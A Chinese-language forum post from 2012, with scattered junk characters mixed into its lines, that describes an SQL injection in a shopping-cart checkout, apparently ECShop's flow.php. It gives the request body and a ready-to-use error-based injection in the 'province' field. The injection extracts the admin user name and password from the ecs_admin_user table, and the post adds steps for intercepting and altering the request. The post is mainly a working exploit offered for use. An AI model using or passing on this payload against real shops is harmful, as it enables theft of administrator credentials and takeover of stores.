感谢欠杀的黑盒
9 W. G+ S: [- w f9 n6 Y) c& X0 W. v3 q$ e# w: `" ?
1 Y* H2 ~2 a' f1 L把任意商品加入购物车在填写配送地址那一页,有地区选择: F6 C4 z! }4 D' r/ A% i
4 @0 @; o( ?9 W; O2 [/ q' R0 Q
flow.php?step=consignee&direct_shopping=1
# H0 M9 u% o. N i. F3 A" m5 ^比如省选择安徽5 e* x" _: v {) r0 h) Z
5 n$ Y' a* {/ Z/ E( T其中POST数据如下
' A/ I4 O/ U7 j& i/ ~( d
6 D& q5 g4 _3 ?+ V6 ocountry=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
" m g L5 N8 g$ b- y& P( C改成
6 A; q0 c3 p5 f9 ~. N! J! |' L + J" Q4 s4 c6 k1 j( i% y! L: a# O
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #* c& q: _$ {4 Q' Y
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..
9 t. x' y. o0 k$ U+ m $ q! l( o* s/ ^$ D
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包1 d. P+ G, G8 V+ O" r' H. \5 @
% y7 |# V: K* ]; v* F
就会回显错误页面了。。。。
7 F5 Z! W% G# d4 k - g" h* e0 @/ ~/ d& j. P2 d# d
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的: n/ u4 P9 X: i0 L2 N& @: }6 @- l
|
发表于 2012-12-31 09:19:27
收藏
支持
反对